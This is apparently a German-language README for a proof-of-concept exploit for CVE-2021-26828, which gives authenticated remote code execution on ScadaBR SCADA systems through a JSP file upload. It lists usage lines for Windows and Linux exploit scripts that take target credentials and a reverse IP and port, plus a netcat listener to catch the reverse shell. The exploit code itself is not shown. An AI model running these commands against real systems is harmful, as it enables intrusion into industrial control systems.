
Proof-of-concept-Exploit für CVE-2021-26828, der authentifizierte Remote-Codeausführung auf ScadaBR-SCADA-Systemen über JSP-Datei-Upload ermöglicht. Unterstützt Windows- und Linux-Ziele mit Reverse-Shell-Payloads.
$ sudo python WinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass>
$ sudo nc -vnlp 4444
$ sudo python LinScada_RCE.py <Remote_Host> <Remote_Port> <User> <Pass> <Reverse_IP> <Reverse_Port>

Referenzen: